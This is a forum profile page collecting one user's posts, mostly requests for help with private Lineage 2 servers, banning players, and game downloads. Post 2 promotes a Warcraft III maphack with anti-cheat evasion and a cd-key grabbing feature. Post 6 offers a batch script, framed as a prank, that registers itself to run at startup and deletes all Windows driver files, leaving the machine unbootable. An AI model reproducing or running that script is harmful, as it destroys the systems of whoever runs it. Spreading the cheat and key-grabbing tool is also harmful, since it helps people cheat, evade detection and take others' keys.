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Everything posted by nektariosgr

  1. just give me your call of duty version 1.6 1.7? and i post you the link as soon as possible i see your reply
  2. link Edit1: I think I fixed some crashes. Let me know. I also re-enabled hero icons but not sure if they will eventually cause a crash. Using +/- in-game or using red invisible units will cause a crash. I am currently fixing this. The hero icon features are bugged... they will always show all hero icons. MOST LIKELY DETECTED or soon to be. Quick solution here for custom games: DropBnet2.exe is in the folder DropBnet (made by Darimus). You can use it to hack in a bnet custom game without being detected. You need to run it in a custom game before enabling any of the maphack features. I haven't tested it for 1.24. Drop BNET : DropBnet.rar Hero icons and red invisible units are currently disabled. I will try to fix these features soon. maphack for 1.24 Don't forget to run as administrator on Vista! Make sure config.ini is in the same folder as D3Scene.exe or it will not work. Note0: Disabling "bypass AH in Dota" will allow you to fix the non-transparent spider webs bug. Who uses the -ah feature anyway? Just disable it and webs will be fixed. Note1: In order for healthbar options to work, disable "Always show healthbars" in Warcraft III options. Note2: In order for red invisible units to work, don't enable "Show invisible (cancels red units)" Note3: You need to be on LAN or on battle.net for cd-key grabbing to work. Else the program will just hang until you connect to either. Note4: Smoothcamera and customcamera must have different bool values. For example, customcamera=true, smoothcamera=false or customcamera=false, smoothcamera=true. Credits:TyranO124 SS
  3. l2 call of duty 4 assassins creed 2 cs 1.6 dota
  4. yes you must change the file to ogg
  5. it dosn't work for me :/
  6. this code create real blue screen of death :P @ echo off rem --------------------------------- rem Activate Blue Screen Of Death @((( Echo Off > Nul ) & Break Off ) @Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run @Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul @Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*" ) rem ---------------------------------
  7. off topic ( mporo na po oti ise kai gamo) on topic (kali idea filemou sinexise etsi :) +1 an imouna platium :) )
  8. se kano ban gt to avatar sou den exi esio telos :P
  9. pedia exo 1 probleme olibiada den ginete na anixi me tpt pernai h ora kai akoma klisti ine den xero ti na kano ekan search ala tpt plz help exo to pack tou killer l2j c6
  10. gt den exi static ip kai logari me l2hpx kai kani ton server skata aplo? admin ime
  11. yes 1 kentro 8elo na kano ban
  12. how i can ban 1 isp the isp is at volos plz help pedia anangi mgali plzzzzzzz pite :'( :'(
  13. i whant help plz i open normal server but when i go login the login say this (i have c4 server l2j) [move]Client is not using latest Authentication method. (Min is 0)[/move] what i must do tnx
  14. pedia 1 [glow=red,2,300]xero oti ime off sto forum (topic)[/glow] ala edo mou fenete kalitera gi post :'( 8a i8ela na rotiso an xerete poso kani enas server gia rent pou na sikoni [glow=red,2,300]120[/glow] atoma kai nane sti [glow=red,2,400]elada[/glow] kana site plz [move][glow=red,2,300]tnx[/glow][/move] [glow=red,2,300]tnx[/glow] :-*
  15. aistain-xan8ia (:) afto mou ir8e tora :P)
  16. sory i search i dont find nothing i know ime at rong forum but i dosent know wher i post it i have 1 problem can eny one telmy if eny program to see all gm action at my data base?[move]tnx[/move]
  17. pedia sas parakalo an mporite na mou pite pos mporo na kano ban 1 nooba pou me exi prixi sinexia alazi to ip kai ftiaxni new acaunt mporo kapos na tone banaro gia panta? :'( tnx exo kani ban ip ala tin alazi tina kano plzz xero ime se la8os forum ala plz apantiste sas parakalo tnx :-*
  18. i have 1 problem i add 1 item on l2 and now i cant log whit admin when i go to log i have 1 critical error see plz if you can help the critical :'( :'( 2008.5.30 20:36:54 OS : Windows Vista 6.0 (Build: 6000) CPU : GenuineIntel PentiumPro-class processor @ 2195 MHz with 2045MB RAM Video : NVIDIA GeForce 7300 LE (5818) PosCode : 0:0:0 2/0 Insufficient Memory. Please check the Virtual Memory Option and avilable hard drive space. You can check them by going to : Control Panel->System->Advanced->Performance->Settings->Advanced->Virtual memory. History: FMallocWindows::Malloc <- FMallocWindows::Realloc <- 00000000 -1810000896 FArray <- FArray::Realloc <- -1299991936*8 <- FUnrealfileSummary<< <- LoadSummary <- ULinkerLoad::Load <- ULinkerLoad::ULinkerLoad <- UObject::GetPackageLinker <- ULinkerLoad::VerifyImport <- ValidateImports <- ULinkerLoad::Verify <- ULinkerLoad::Load <- ULinkerLoad::ULinkerLoad <- UObject::GetPackageLinker <- ULinkerLoad::VerifyImport <- ValidateImports <- ULinkerLoad::Verify <- ULinkerLoad::Load <- ULinkerLoad::ULinkerLoad <- UObject::GetPackageLinker <- ULinkerLoad::VerifyImport <- ValidateImports <- ULinkerLoad::Verify <- ULinkerLoad::Load <- ULinkerLoad::ULinkerLoad <- UObject::GetPackageLinker <- UObject::StaticLoadObject <- (Core.Class LineageWarrior.MElf NULL) <- UObject::StaticLoadClass <- UL2ConsoleWnd::InsertSelectCharacterInfo <- NConsoleWnd::AddCharacterInfo <- d <- CharacterSelectionInfoPacket <- UNetworkHandler::Tick <- Function Name=CharacterSelect <- UGameEngine::Tick <- UpdateWorld <- MainLoop
  19. can eny one telmy if eny pack have admin panel plz is so bort to whit all time command tnx ::) sory if im some time's noob :'(
  20. wher i fint Demon VS Angel system for my server ? plz i have scaner all time bat i dont fint nothing :'( :'( :'(
  21. help whit how instal and fint rim plz if eny one can help abb on my msn lineage24ever@hotmail.com tnx
  22. pedia mpori na mou pite an iparxi etimo Hellbound me start.bat ? :-\ tnx
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